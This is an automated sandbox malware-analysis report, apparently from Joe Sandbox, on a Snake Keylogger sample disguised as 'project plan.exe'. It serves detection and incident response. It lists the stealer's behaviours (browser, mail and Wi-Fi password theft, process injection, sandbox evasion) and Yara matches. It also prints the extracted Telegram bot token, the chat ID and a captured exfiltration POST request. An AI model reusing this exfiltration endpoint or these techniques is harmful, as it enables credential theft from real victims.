Windows Analysis Report
project plan.exe

Overview

General Information

Sample name: project plan.exe
Analysis ID: 1466687
MD5: ec263cafbd93faeb218574586bf8e45f
SHA1: 2d37614bb075a8580fc5fe7851dedbc88911944c
SHA256: 7c801923836d6b568d00a338b6bcf41889a7a9150c41a4274c21e50d9eb86f33
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Capture Wi-Fi password
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendMessage?chat_id=5361285164"}
Source: RegAsm.exe.6132.3.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendMessage"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: project plan.exe Joe Sandbox ML: detected

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: project plan.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Windows.Forms.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Drawing.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Drawing.pdbX source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Drawing.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Windows.Forms.pdb; source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbH source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 00F6A3BFh 3_2_00F6A100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 00F6969Fh 3_2_00F693E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 00F68848h 3_2_00F68430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 00F69AFFh 3_2_00F69841
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 00F69F5Fh 3_2_00F69CA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 00F678A9h 3_2_00F66DDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 00F6923Fh 3_2_00F68E97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 00F68109h 3_2_00F67E49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_00F66300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 00F68848h 3_2_00F68429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 00F68848h 3_2_00F68776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_00F66933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_00F66B14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06146CE1h 3_2_06146A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06143D19h 3_2_06143A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06147139h 3_2_06146E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06144171h 3_2_06143EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06147591h 3_2_061472E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 061445C9h 3_2_06144320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 061479E9h 3_2_06147740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06144A21h 3_2_06144778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06147E41h 3_2_06147B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06144E79h 3_2_06144BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06148299h 3_2_06147FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 061452D1h 3_2_06145028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 0614F2D1h 3_2_0614F028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 0614EAF9h 3_2_0614E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 061486F1h 3_2_06148448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06145729h 3_2_06145480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 0614F729h 3_2_0614F480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06148B49h 3_2_061488A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06145B81h 3_2_061458D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 0614FB81h 3_2_0614F8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06148FA1h 3_2_06148CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06145FD9h 3_2_06145D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 061493F9h 3_2_06149150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06146431h 3_2_06146188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06146889h 3_2_061465E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_0614CA5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_0614CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_0614CD86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 061626F9h 3_2_06162450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06160741h 3_2_06160498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 061602E9h 3_2_06160040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06162FA9h 3_2_06162D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06162B51h 3_2_061628A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06160B99h 3_2_061608F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 061619F2h 3_2_06161748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06163859h 3_2_061635B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06163401h 3_2_06163158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 061622A1h 3_2_06161FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp 06161E49h 3_2_06161BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_06169F14

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9b102694a6eaHost: api.telegram.orgContent-Length: 534Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 132.226.247.73 132.226.247.73
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: checkip.dyndns.org
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9b102694a6eaHost: api.telegram.orgContent-Length: 534Connection: Keep-Alive
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002D29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Detected potential crypto function
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F1194D 0_2_00007FF848F1194D
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F10B3C 0_2_00007FF848F10B3C
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F14620 0_2_00007FF848F14620
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F19680 0_2_00007FF848F19680
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F1BD90 0_2_00007FF848F1BD90
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F105F0 0_2_00007FF848F105F0
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F24F03 0_2_00007FF848F24F03
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F11F30 0_2_00007FF848F11F30
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F24F50 0_2_00007FF848F24F50
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F10F90 0_2_00007FF848F10F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F6C19C 3_2_00F6C19C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F6A100 3_2_00F6A100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F693E0 3_2_00F693E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F634F3 3_2_00F634F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F688C0 3_2_00F688C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F69841 3_2_00F69841
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F69CA1 3_2_00F69CA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F66DDF 3_2_00F66DDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F68E97 3_2_00F68E97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F67E49 3_2_00F67E49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F662EF 3_2_00F662EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F66300 3_2_00F66300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F688B0 3_2_00F688B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F68F10 3_2_00F68F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06146A38 3_2_06146A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06143A70 3_2_06143A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06146E90 3_2_06146E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06143EC8 3_2_06143EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061472E8 3_2_061472E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614DAE8 3_2_0614DAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06144320 3_2_06144320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06147740 3_2_06147740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06144778 3_2_06144778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06147B98 3_2_06147B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06144BD0 3_2_06144BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061407C8 3_2_061407C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06147FF0 3_2_06147FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06145028 3_2_06145028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614F028 3_2_0614F028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614E850 3_2_0614E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06148448 3_2_06148448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06145480 3_2_06145480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614F480 3_2_0614F480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061488A0 3_2_061488A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061458D8 3_2_061458D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614F8D8 3_2_0614F8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06148CF8 3_2_06148CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06145D30 3_2_06145D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06149150 3_2_06149150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614ED68 3_2_0614ED68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06146188 3_2_06146188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061495A8 3_2_061495A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061465E0 3_2_061465E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614CDE8 3_2_0614CDE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06146A29 3_2_06146A29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614CA5F 3_2_0614CA5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614CA70 3_2_0614CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06143A60 3_2_06143A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06146E80 3_2_06146E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06143EB9 3_2_06143EB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061472D8 3_2_061472D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06144310 3_2_06144310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06147733 3_2_06147733
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06144768 3_2_06144768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06147B88 3_2_06147B88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06144BC1 3_2_06144BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06147FE3 3_2_06147FE3
